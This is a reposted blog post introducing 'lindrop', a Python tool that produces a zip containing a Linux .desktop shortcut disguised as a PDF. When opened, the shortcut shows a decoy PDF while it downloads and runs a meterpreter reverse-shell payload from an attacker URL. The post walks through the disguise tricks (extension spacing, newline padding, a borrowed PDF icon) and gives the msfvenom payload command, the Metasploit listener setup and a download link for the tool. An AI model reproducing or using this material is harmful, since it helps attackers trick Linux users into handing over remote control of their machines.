未加星标

lindrop a social engineering vector for linux targets

字体大小 | |
[系统(linux) 所属分类 系统(linux) | 发布者 店小二03 | 时间 2016 | 作者 红领巾 ] 0人收藏点击收藏

A quick/dirty python utility that generates a zip containing a “malicious” .desktop (aka shortcut) file that masquerades as a PDF file (not really, sort of). This is probably nothing new, but i needed a way to specifically target linux users for certain social engineering engagements, where I could send a zip file via email, and generate something on-the-fly. So i came up with this quick mess of a tool.

It basically exploits the “Exec” section of a .desktop file to:

1. Download a PDF and display it to the user.

2. Download and execute a linux/x86/meterpreter/reverse_tcp payload.

There’s some really oldschool basic obfuscation involved in the creation of the .desktop file. For one, the file name is generated with spaces between the .pdf and .desktop extensions. This is to obfuscate the actual file extension when the .zip is just straight-up opened up in Archive Manager:


lindrop   a social engineering vector for linux targets

Second, there’s a bunch of newlines ‘\n’ in the actual .desktop file itself, so if double clicked on, from inside Archive Manager, unless you scroll all the way down, there’s nothing too obvious (aside from the fact it’s actually not a PDF. (lol)


lindrop   a social engineering vector for linux targets

Another thing to note here…the “Icon” section. This contains a reference to a local SVG file which gives the .desktop shortcut an icon. In this case, we’re using an icon that’s typically included with gnome and associated to PDF files. If this SVG file doesn’t exist on the target system, then the file will look like an executable, blowing its amazing cover story of being a PDF file.

Anyway…on to the tool…

Lindrop takes 4 inputs:

An output name for the “PDF” (.desktop) file that will be in the zip. An output name for the ZIP file. A remote payload URL. (I.e., http://www.attacker.com/payload) This will be downloaded to the /tmp directory on the target box. For this example, we’re simply creating a payload with msfvenom:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=listener_ip LPORT=listener_port -f elf > payload A remote PDF to download and display to the user. In the case of this example, we’re remotely loading Blackhat 2016’s Attendee survey: https://www.blackhat.com/docs/us-16/2016-Black-Hat-Attendee-Survey.pdf. Behind the scenes, Xpdf is used to open the PDF file.

You should end up with a zip file, all ready to send to your target:


lindrop   a social engineering vector for linux targets

Extracting the contents gives is a nice little quasi-“PDF” file:


lindrop   a social engineering vector for linux targets

Executing the file, from the perspective of the target, opens up (using Xpdf), the Blackhat presentation (or resume, or whichever PDF you tell it to download/open up):


lindrop   a social engineering vector for linux targets

On the attacker side, we have a listener up using the following resource file in metasploit, waiting for a connection from the payload the .desktop file has downloaded, and that we generated previously with msfvenom:

use exploit/multi/handler

set ExitOnSession false

set LHOST 0.0.0.0

set LPORT 6666

set PAYLOAD linux/x86/meterpreter/reverse_tcp

exploit -j


lindrop   a social engineering vector for linux targets

Oh, this was all tested in the latest Kali Rolling. But will probably work on mostly all distros that handle .desktop files the same way. This code is probably buggy (won’t take spaces in any of the inputs, and probably other minor problems) and i’m sure could be improved. At the moment, it just drops a “pl892” payload in the /tmp directory, along with the remote PDF file downloaded to /tmp/temp.pdf.

You can download lindrop here:

https://gist.github.com/x-42/3d822d85e6b547e7018c919c6d657e8e

Enjoy!

@0rbz_

本文系统(linux)相关术语:linux系统 鸟哥的linux私房菜 linux命令大全 linux操作系统

分页:12
转载请注明
本文标题:lindrop a social engineering vector for linux targets
本站链接:http://www.codesec.net/view/483391.html
分享请点击:


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | 系统(linux) | 评论(0) | 阅读(36)